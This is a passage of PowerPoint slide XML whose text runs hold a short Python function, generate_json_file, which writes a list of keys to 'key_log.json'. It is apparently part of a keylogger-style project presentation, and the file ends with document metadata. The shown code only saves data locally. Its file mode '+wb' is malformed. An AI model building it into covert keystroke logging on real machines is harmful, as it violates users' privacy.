              <a:rPr dirty="0" lang="en-IN"/>
              <a:t># Define the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>    with open('</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_log.json</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>', '+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>wb</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>') as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>json.dumps</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>).encode()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_log.write</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN" err="1"/>
              <a:t>key_list_bytes</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-IN"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>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gokulsuresh766@gmail.com</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-25T18:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-16T08:58:14Z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f6f7a5947f3c413cb5f2cb9fe609625d</vt:lpwstr>
  </property>
</Properties>
</file>